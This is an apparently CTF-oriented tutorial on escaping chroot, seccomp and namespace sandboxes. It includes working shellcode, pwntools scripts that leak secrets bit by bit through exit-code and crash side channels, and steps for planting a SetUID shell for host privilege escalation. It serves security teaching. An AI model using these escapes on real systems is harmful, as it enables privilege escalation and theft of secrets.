description |
---|
Escaping from sandbox environments by exploiting the capabilities that were left open |
chroot is a command and syscall whose name means Change Root: it changes the meaning of / for the calling process. You provide it with a path to a directory that will be the jail, and it does two things (source):
- Point / to the jailed directory (e.g. /tmp/jail)
- While inside the jail, ../ will not go up further than the root (/tmp/jail/.. -> /tmp/jail)
This command or syscall normally needs root permissions to work, and can be called like this:
chroot("/tmp/jail")
Or in the shell:
$ chroot /tmp/jail
Afterward, any path starting with / will be relative to /tmp/jail, and if your current directory is /tmp/jail, any ../ attempt will stop at /tmp/jail. A common pitfall is that paths like /bin/bash, and even the dynamically linked libraries needed to spawn a shell, are also resolved inside the jail, so everything the program needs must be copied into the jail directory.
Importantly, what it does not do is:
- Close existing resources (file descriptors)
- Change the current working directory into the jail
It is not intended to be a security measure, as it is very limited in what it does, and many tricks can get past its protections, as will be explained in the following section.
One simple problem is that chroot does not move the current directory into the jail. Anything in the directory you were in before entering the jail stays reachable through relative paths, and ../ sequences work freely. The only catch is that paths starting with / are still relative to the jail.
$ cd / # move to root first
$ ./program # program might chroot() us to /tmp/jail, but forget to chdir()
# cat /flag # attempt to access normally
/tmp/jail/flag: No such file or directory
# cat flag # flag will be relative to CWD, so /flag is accessed
CTF{f4k3_fl4g_f0r_t3st1ng}
$ ./program # start from anywhere outside of /tmp/jail
# cat ../../flag # directory traversal is still possible
CTF{f4k3_fl4g_f0r_t3st1ng}
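The lookups in the two sessions above can be reproduced with a small model. This is only a sketch: `resolve` is a hypothetical helper that walks a path lexically and ignores symlinks and mount points, which the real kernel lookup does not. It encodes the two rules described earlier: absolute paths start at the changed root, and `..` is only pinned while the walk is standing exactly on that root.

```python
import posixpath


def resolve(path, root, cwd):
    """Lexically model where `path` ends up for a process whose root is `root`.

    Simplification: symlinks and mount points are ignored.
    """
    # Absolute paths start at the (changed) root, relative ones at the real cwd.
    current = root if path.startswith("/") else cwd
    for part in path.split("/"):
        if part in ("", "."):
            continue
        if part == "..":
            # ".." is only pinned when the walk is standing exactly on the root.
            if current != root:
                current = posixpath.dirname(current)
        else:
            current = posixpath.join(current, part)
    return current


JAIL = "/tmp/jail"
print(resolve("/flag", JAIL, cwd="/"))                # stays inside the jail
print(resolve("flag", JAIL, cwd="/"))                 # relative to the old cwd
print(resolve("../../flag", JAIL, cwd="/home/user"))  # traversal from outside
print(resolve("../../flag", JAIL, cwd=JAIL))          # cwd inside: ".." is pinned
```

Because the check compares against the root itself, a current directory that is not below the root never meets it while walking upward, which is why the traversal from /home/user reaches the real /flag.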
shellcode.md (Assembly - readfile.s)
{% code title="readfile.s" %}
.global _start
_start:
.intel_syntax noprefix
mov rax, 2
lea rdi, [rip+flag]
mov rsi, 0
syscall # open("../../flag", O_RDONLY)
mov rsi, rax # use return value (fd)
mov rax, 40
mov rdi, 1 # STDOUT
mov rdx, 0
mov r10, 100
syscall # sendfile(STDOUT, flag_fd, 0, 100)
flag:
.string "../../flag"
{% endcode %}
Another big problem is that a process has only one root at a time, meaning that if chroot is called again the previous jail is forgotten. Remember that only users with the CAP_SYS_CHROOT capability can call it, but if you are able to, it is trivial to escape the jail, even from inside it. This can be done by moving the jail to somewhere you are not, such as a new directory you make, so that your current directory ends up outside the new root.
$ ./program # this time chroot() and chdir() are called
# cat ../../flag # first attempt fails because ../ inside jail doesn't work
/tmp/jail/flag: No such file or directory
# mkdir new_dir
# chroot new_dir # set chroot() to a new directory you are not in
# cat ../../flag # now ../ is not restricted
CTF{f4k3_fl4g_f0r_t3st1ng}
shellcode.md (Assembly - mkdir-chroot.s)
{% code title="mkdir-chroot.s" %}
.global _start
_start:
.intel_syntax noprefix
mov rax, 83
lea rdi, [rip+dir]
mov rsi, 0777
syscall # mkdir("a", 0777)
mov rax, 161
lea rdi, [rip+dir]
syscall # chroot("a")
# Now cwd is outside the chroot
mov rax, 2
lea rdi, [rip+flag]
mov rsi, 0
syscall # open("../../flag", O_RDONLY)
mov rsi, rax # use return value (fd)
mov rax, 40
mov rdi, 1 # STDOUT
mov rdx, 0
mov r10, 100
syscall # sendfile(STDOUT, flag_fd, 0, 100)
dir:
.string "a"
flag:
.string "../../flag"
{% endcode %}
The last trick is using already-opened resources that are outside the jail, which you can still interact with. If you are able to open the /flag file before being jailed, for example, you can still read from its file descriptor (the first free descriptor is normally 3).
// === Somewhere earlier in the program ===
open("/flag") // -> returns 3 as fd
chroot(...)
// === In the shellcode ===
//sendfile(int out_fd, int in_fd, off_t *offset, size_t count)
sendfile(1, 3, 0, 100)
shellcode.md (Assembly - fd-sendfile.s)
{% code title="fd-sendfile.s" %}
.global _start
_start:
.intel_syntax noprefix
mov rax, 40
mov rdi, 1 # STDOUT
mov rsi, 3 # previously open file descriptor of /flag
mov rdx, 0
mov r10, 100
syscall # sendfile(STDOUT, flag_fd, 0, 100)
{% endcode %}
The same goes for open directories: an open directory descriptor can serve as the starting point for relative paths in syscalls like openat instead of open, or fchmodat instead of chmod.
// === Somewhere earlier in the program ===
open("/any/path") // -> returns 3 as fd
chroot(...)
// === In the shellcode ===
//sendfile(int out_fd, int in_fd, off_t *offset, size_t count)
fd = openat(3, "../../flag", 0) // -> returns 4 as fd
sendfile(1, fd, 0, 100)
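The directory-descriptor lookup can be tried without any jail at all. The sketch below uses Python's `os.open` with its `dir_fd` argument, which maps to `openat` on Linux. The temporary directory layout is a stand-in for /flag and /any/path, and no chroot is involved, so it only demonstrates that the lookup starts at the descriptor rather than at the current directory.

```python
import os
import tempfile

with tempfile.TemporaryDirectory() as base:
    # Layout: base/flag and base/any/path/ (stand-ins for /flag and /any/path)
    os.makedirs(os.path.join(base, "any", "path"))
    with open(os.path.join(base, "flag"), "w") as f:
        f.write("CTF{f4k3_fl4g_f0r_t3st1ng}")

    # "Earlier in the program": a directory is opened and the descriptor kept.
    dir_fd = os.open(os.path.join(base, "any", "path"),
                     os.O_RDONLY | os.O_DIRECTORY)

    # "Later": the relative path is walked starting from dir_fd.
    flag_fd = os.open("../../flag", os.O_RDONLY, dir_fd=dir_fd)
    leaked = os.read(flag_fd, 100)
    os.close(flag_fd)
    os.close(dir_fd)

print(leaked)
```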
shellcode.md (Assembly - fd-openat.s)
{% code title="fd-openat.s" %}
.global _start
_start:
.intel_syntax noprefix
mov rax, 257
mov rdi, 3
lea rsi, [rip+flag]
mov rdx, 0
syscall # openat("/any/path", "../../flag", O_RDONLY)
mov rsi, rax # return value (fd)
mov rax, 40
mov rdi, 1 # STDOUT
mov rdx, 0
mov r10, 100
syscall # sendfile(STDOUT, flag_fd, 0, 100)
flag:
.string "../../flag"
{% endcode %}
This last method is even more powerful because if you can start the program yourself from bash (for example a SetUID binary), you can let bash open a directory for you using the [n]< path syntax:
# # === same effect as above ===
$ ./program 3< /any/path
{% hint style="info" %}
Using the fchdir syscall you can also use this trick to change the current directory to one outside the chroot, and use ../ directory traversal tricks again
{% endhint %}
Seccomp (secure computing mode) is built to be a security mechanism, unlike chroot. It is a highly customizable way to restrict which syscalls are allowed, and it works much like a network firewall (it even uses the Berkeley Packet Filter, originally made for networking). Often you will see it used as an allowlist (everything blocked except a few syscalls) or a blocklist (everything allowed except a few syscalls). Blocklists are inherently dangerous because a developer may forget a dangerous call with unexpected functionality, but syscalls in an allowlist may still give unnecessary permissions that can be exploited.
A simple example of an allowlist using seccomp looks like this:
#include <assert.h>
#include <seccomp.h>

scmp_filter_ctx ctx; // define context variable to set up rules
// Kill the program on any syscall
ctx = seccomp_init(SCMP_ACT_KILL);
// ... except read (allow)
assert(seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(read), 0) == 0);
// ... except write (allow)
assert(seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(write), 0) == 0);
// load the context, rules are applied from now on
assert(seccomp_load(ctx) == 0);
Loading the filter is irreversible: from then on the rules apply to all code that runs later in the process, including shellcode, child processes and forks, but also the program's own code. Because of this, the rules need to be lenient enough to allow the code the program legitimately needs, but not so lenient that an exploit can abuse them.
A good start in trying to bypass these rules is understanding them correctly. While static analysis might be enough for a simple program, a more complex one can be easier to understand through dynamic analysis. The following tool implements handy utilities for extracting seccomp rules:
{% embed url="https://github.com/david942j/seccomp-tools" %} A tool to extract and work with seccomp rules {% endembed %}
The simplest and most common command is seccomp-tools dump, which takes a binary that it will run. Using ptrace, it can extract the seccomp rules at runtime and print them to the console:
$ seccomp-tools dump ./binary
line CODE JT JF K
=================================
0000: 0x20 0x00 0x00 0x00000004 A = arch
0001: 0x15 0x00 0x06 0xc000003e if (A != ARCH_X86_64) goto 0008
0002: 0x20 0x00 0x00 0x00000000 A = sys_number
0003: 0x15 0x00 0x01 0x00000002 if (A != open) goto 0005
0004: 0x06 0x00 0x00 0x00000000 return KILL
0005: 0x15 0x00 0x01 0x00000101 if (A != openat) goto 0007
0006: 0x06 0x00 0x00 0x00000000 return KILL
0007: 0x15 0x00 0x01 0x0000003b if (A != execve) goto 0009
0008: 0x06 0x00 0x00 0x00000000 return KILL
0009: 0x06 0x00 0x00 0x7fff0000 return ALLOW
Seccomp rules are built with Berkeley Packet Filters (BPF), meaning they have instructions and code flow like assembly. This is what you see dumped and can analyze.
In the above example, the filter first checks whether the architecture is x86-64. If not, it will goto the return KILL instruction, blocking any 32-bit syscalls. Then, step by step, the syscall number is compared against open, openat, and execve, and the process is killed if it matches any of them. When it passes all the checks it ends at return ALLOW, continuing with the syscall.
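To make the control flow concrete, here is a minimal sketch of an interpreter for just the three BPF opcodes that appear in the dump (load, jump-if-equal, return). `FILTER` and `run_filter` are hypothetical names, and one value is an assumption: the false-jump offset of row 0001 is taken to be 6, so that it lands on row 0008 as the disassembly column says. This is a model for reading dumps, not how the kernel implements it.

```python
AUDIT_ARCH_X86_64 = 0xC000003E
AUDIT_ARCH_I386 = 0x40000003
KILL, ALLOW = 0x00000000, 0x7FFF0000

# (code, jt, jf, k) rows of the dump; jf of row 0001 is assumed to be 6.
FILTER = [
    (0x20, 0, 0, 4),                  # 0000: A = arch
    (0x15, 0, 6, AUDIT_ARCH_X86_64),  # 0001: if (A != ARCH_X86_64) goto 0008
    (0x20, 0, 0, 0),                  # 0002: A = sys_number
    (0x15, 0, 1, 2),                  # 0003: if (A != open) goto 0005
    (0x06, 0, 0, KILL),               # 0004: return KILL
    (0x15, 0, 1, 257),                # 0005: if (A != openat) goto 0007
    (0x06, 0, 0, KILL),               # 0006: return KILL
    (0x15, 0, 1, 59),                 # 0007: if (A != execve) goto 0009
    (0x06, 0, 0, KILL),               # 0008: return KILL
    (0x06, 0, 0, ALLOW),              # 0009: return ALLOW
]


def run_filter(nr, arch=AUDIT_ARCH_X86_64):
    """Return "KILL" or "ALLOW" for syscall number `nr` under FILTER."""
    data = {0: nr, 4: arch}  # the two seccomp_data fields this filter reads
    acc, pc = 0, 0
    while True:
        code, jt, jf, k = FILTER[pc]
        pc += 1
        if code == 0x20:    # ld: A = data[k]
            acc = data[k]
        elif code == 0x15:  # jeq: skip jt rows on a match, jf rows otherwise
            pc += jt if acc == k else jf
        elif code == 0x06:  # ret: k is the verdict
            return "ALLOW" if k == ALLOW else "KILL"
        else:
            raise ValueError(f"opcode {code:#x} is not modeled")


for name, nr in [("read", 0), ("open", 2), ("openat", 257), ("execve", 59)]:
    print(name, run_filter(nr))
print("open via i386 arch", run_filter(5, arch=AUDIT_ARCH_I386))
```

Jump offsets are relative to the next row, which is why a `jf` of 1 on row 0003 lands on row 0005.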
In more practical situations the program might need some arguments or configuration before the seccomp filter is activated, so the tool won't find the rules by just running the binary. A simple trick for passing arguments is creating a .sh file that starts the program how you want it, and then analyzing that:
$ nano start.sh
./binary arg1 arg2 arg3
$ chmod +x start.sh
$ seccomp-tools dump ./start.sh
...
Lastly, you can even attach to a running process with this tool if the process is in a seccomp'ed state you would like to analyze.
$ sudo seccomp-tools dump -p 1337
$ sudo seccomp-tools dump -p `pidof binary`
There is no clean-cut way to "bypass" any seccomp configuration, and it really depends on what specific syscalls are allowed or denied. With that being said, there are some tricks developers might not expect that can still lead to a big impact (source).
When common syscalls like open are blocked, there may be similar syscalls the developer forgot to block. Something like openat might still be allowed, and it can do almost the same using a Directory File Descriptor (DFD). In this specific case, a useful constant is AT_FDCWD, which has a value of -100. It is a special DFD that refers to the current working directory, meaning it can be used as a valid DFD in the ...at versions of syscalls.
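The AT_FDCWD behaviour can be checked from Python by calling libc's `openat` directly through `ctypes`. This is a Linux-only sketch: `open_without_open` is a hypothetical helper name, no seccomp filter is installed here, and the temporary file only stands in for a file you would want to read. It shows that passing -100 as the DFD makes `openat` behave like `open` for a relative path.

```python
import ctypes
import os
import tempfile

AT_FDCWD = -100  # value from <fcntl.h> on Linux

libc = ctypes.CDLL(None, use_errno=True)
libc.openat.argtypes = [ctypes.c_int, ctypes.c_char_p, ctypes.c_int]
libc.openat.restype = ctypes.c_int


def open_without_open(path):
    """Open `path` read-only via openat(AT_FDCWD, ...) and return the fd."""
    fd = libc.openat(AT_FDCWD, os.fsencode(path), os.O_RDONLY)
    if fd < 0:
        err = ctypes.get_errno()
        raise OSError(err, os.strerror(err), path)
    return fd


with tempfile.TemporaryDirectory() as workdir:
    with open(os.path.join(workdir, "flag"), "wb") as f:
        f.write(b"CTF{f4k3_fl4g_f0r_t3st1ng}")
    previous = os.getcwd()
    os.chdir(workdir)  # "flag" is now relative to the current directory
    try:
        fd = open_without_open("flag")
        data = os.read(fd, 100)
        os.close(fd)
    finally:
        os.chdir(previous)

print(data)
```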
There are simply a ton of syscalls, making a blocklist hard to make secure. You can check out a table of all syscalls to find one that seems interesting and is allowed, and get more information about an unknown syscall using the man 2 command for syscalls (e.g. man 2 openat).
This is a special case. There are two ways to make a syscall on x86-64 Linux: the syscall instruction, which uses the 64-bit syscall table, and int 0x80, which uses the 32-bit table. The two tables use different syscall numbers, passed in rax and eax respectively. By default, seccomp will kill all 32-bit syscalls. However, in certain non-default situations, you might find the 32-bit syscalls are enabled and more permissive than the 64-bit ones. They can be enabled with the following line, and afterward need to be handled separately from 64-bit syscalls:
seccomp_arch_add(ctx, SCMP_ARCH_X86);
To exploit this, simply use a 32-bit syscall table and int 0x80 instructions instead of syscall. You don't need to do anything special during compilation. Here is an example:
{% code title="32-bit.s" %}
mov eax, 5
lea ebx, [rip+flag]
mov ecx, 0
int 0x80 # open("flag", O_RDONLY)
mov ecx, eax # return value (fd)
mov eax, 187
mov ebx, 1 # STDOUT
mov edx, 0
mov esi, 100
int 0x80 # sendfile(STDOUT, flag_fd, 0, 100)
flag:
.string "flag"
{% endcode %}
While you might want to execute a shell using execve(), sometimes leaking secrets can be enough. If you can access sensitive information but cannot exfiltrate it directly, think about possible side channels. Even 1 bit of information can eventually become a full secret if repeated often enough. Here are some ideas:
- The exit code of the program is 8 bits (0-255), using exit(): In bash, you can check the exit code of the previous command with the $? variable, and executing a program in any programming language often returns its 8-bit exit code. If you are able to read it you can exfiltrate 8 bits in one go, like one character of a string. Then repeatedly do this for each character in the string.
- The runtime of a program, similar to Blind SQL Injection (sleep(), long computation, loop): To be efficient, this is a balance between a low wait for fast attempts, and a long enough wait to be able to confidently measure the difference. This scenario can be useful if there is really no response from the program, like in a remote setting.
- Crash vs no crash: In some cases, it is obvious that a program crashed, because the application explicitly told you with an error message or simply because some expected output is missing. This can tell you 1 bit of information by either crashing or continuing execution, and the way to exploit this is similar to using the runtime of the program.
Using the exit code is pretty straightforward. We will read the flag into memory, then load a byte of it into the exit() argument, and call the function. In Assembly, we could leak the first byte:
mov rax, 0
mov rdi, 3 # "/flag" fd (already open)
lea rsi, [rsp-100] # read onto stack
mov rdx, 100
syscall # read(3, buf, 100)
mov rax, 60
mov rdi, [rsi+0] # offset here is 0, increment for next byte
syscall # exit(flag[0]), only the low 8 bits are reported
This might give exit code 67 when we check using echo $?, which corresponds to the C character. To leak the whole secret, we simply keep doing this while incrementing the offset:
Python Script (go through all bytes)
from pwn import *
elf = context.binary = ELF('./binary')
flag = b""
for i in range(100):
    # Dynamically compile the assembly needed
    payload = asm(f"""
        mov rax, 0
        mov rdi, 3
        lea rsi, [rsp-100]
        mov rdx, 100
        syscall
        mov rax, 60
        mov rdi, [rsi+{i}] # <- insert i (offset) here
        syscall
    """)
    p = process()
    p.send(payload)
    exit_code = p.poll(True)  # Block until program exits
    flag += bytes([exit_code])
    print(flag)
    p.close()
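The byte leak above loads a full 8-byte word into rdi, yet only one character comes back, because the parent only sees the low 8 bits of the exit status. The sketch below illustrates that truncation with an ordinary child process instead of shellcode. `exit_status` is a hypothetical helper, and four bytes of the fake flag stand in for the word the shellcode would load.

```python
import subprocess
import sys


def exit_status(value):
    """Run a child that calls exit(value) and return the status the parent sees."""
    child = subprocess.run([sys.executable, "-c", f"import sys; sys.exit({value})"])
    return child.returncode


# Little-endian load of the first flag bytes, like a register load from memory.
loaded = int.from_bytes(b"CTF{", "little")
status = exit_status(loaded)
print(hex(loaded), status, chr(status))
```

The lowest byte of a little-endian load is the byte at the given offset, so stepping the offset by one per run walks through the secret one character at a time.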
When the exit code is not directly visible, you might be able to get a boolean response using the time or crash method. This can be implemented in various ways, but the simplest and most efficient is to take the nth bit of the secret and decide what to do depending on that bit.
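For the time-based variant, the idea can be sketched with a local stand-in for the sandboxed program. Everything here is hypothetical: `oracle` plays the role of a payload that stalls only when the chosen bit is 1, `SECRET` is a made-up value it holds, and the 50 ms delay is an arbitrary choice that a real remote target would likely need to be much larger to survive network jitter.

```python
import time

SECRET = b"CTF{"  # hypothetical secret held by the stand-in oracle
DELAY = 0.05      # how long the payload stalls for a 1 bit (seconds)


def oracle(byte_index, bit_index):
    """Stand-in for the sandboxed payload: stall only when the chosen bit is 1."""
    if (SECRET[byte_index] >> bit_index) & 1:
        time.sleep(DELAY)


def leak_bit(byte_index, bit_index):
    """Recover one bit purely from how long the oracle took to return."""
    start = time.perf_counter()
    oracle(byte_index, bit_index)
    return time.perf_counter() - start > DELAY / 2


def leak_byte(byte_index):
    # Reassemble the byte from its eight bits, least significant first.
    return sum(leak_bit(byte_index, bit) << bit for bit in range(8))


recovered = bytes(leak_byte(i) for i in range(len(SECRET)))
print(recovered)
```

The threshold sits halfway between the two cases, which is the balance described in the list of ideas: a shorter delay is faster per attempt but leaves less margin for measurement noise.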
To crash the program, you could read/write from an unmapped address for a 1, and simply ret for a 0. This is nicer than a time-based boolean result because you get an instant yes/no response, allowing quicker and more confident extraction. To extract a single bit in assembly, you can first use a byte offset, and then mask it using a bit offset:
mov rax, 0
mov rdi, 3
lea rsi, [rsp-100]
mov rdx, 100
syscall
mov al, BYTE PTR [rsi+1] # 8a 46 01 (01 is byte placeholder)
and al, 2 # 24 02 (02 is bit placeholder)
jnz crash # jump depending on result
ret
crash:
mov QWORD PTR [rax], 0 # Write to a low address that should be unmapped
We can then dynamically change this payload to get any byte and bit we need. In a Python script we go through all the bits to slowly recover the whole secret:
Python Script (go through all bits)
from pwn import *
elf = context.binary = ELF('./binary')
PAYLOAD = asm("""
mov rax, 0
mov rdi, 3
lea rsi, [rsp-100]
mov rdx, 100
syscall
mov al, BYTE PTR [rsi+1] # 8a 46 01
and al, 2 # 24 02
jnz crash
ret
crash:
mov BYTE PTR [rax], 0
""")
def get_bit(offset):
    p = process([elf.path, '/flag'])
    byte = offset // 8
    bit = offset % 8
    payload = PAYLOAD  # Replace byte and bit placeholders
    payload = payload.replace(b"\x8a\x46\x01", bytes([0x8a, 0x46, byte]))
    payload = payload.replace(b"\x24\x02", bytes([0x24, 1 << bit]))
    p.send(payload)
    exit_code = p.poll(True)  # Block until exit
    p.close()
    if exit_code not in [-11, -31]:
        return get_bit(offset)  # something unexpected happened, try again
    return exit_code == -11

flag = b""
binary = ""
i = 0
while not flag.endswith(b"}"):
    binary = ("1" if get_bit(i) else "0") + binary
    print(f"{binary: >8}")  # Build out byte in binary first
    if len(binary) == 8:  # If full byte, convert to ASCII
        flag += bytes([int(binary, 2)])
        binary = ""
        print(flag)
    i += 1
The workings of namespaces can get very complex, so this section will not go very deep. It will only show a few simple ideas on how to escape from namespaces with specific permissive features.
One dangerous part of namespaces is the ability to mount the host filesystem in the sandboxed environment. If you can read/write as a high-privilege user in the sandbox, you can do the same on the mount. This is most interesting when you have access to a low-privilege user on the host machine and a high-privilege user inside the sandbox. These can interact with each other to possibly gain high privileges on the host machine.
Imagine the host directory /tmp/data is mounted at /data inside the sandbox. When you can write there, you can create a SetUID binary as the high-privilege user and then execute it as the low-privilege user on the host machine:
$ ./program # Enter sandbox
# cp /bin/bash /data/bash # Create a shell binary through mount on the host
# chmod +s /data/bash # Set SetUID permissions on the shell binary
# # === using shellcode ===
# chmod("/data/bash", 06777)
# # Back on the host machine
$ /tmp/data/bash -p # Execute the created SUID shell
bash-5.0#
Even when there is no directory explicitly mounted, you may be able to write a SetUID shell and access it on the host through the jail directory. Similarly to chroot, namespaces can use pivot_root to change / to somewhere else. If you can make this directory accessible to the low-privilege host user, however, you may be able to access the SetUID shell again because it exists on the same filesystem:
$ ./program # Enter sandbox
# cp /bin/bash bash # Create shell binary
# chmod +s bash # Set SetUID permissions as root
# chmod 777 . # Allow low-privilege host user to access the jail directory
# # Back on the host machine
$ /tmp/jail/bash -p # Execute the created SUID shell
bash-5.0#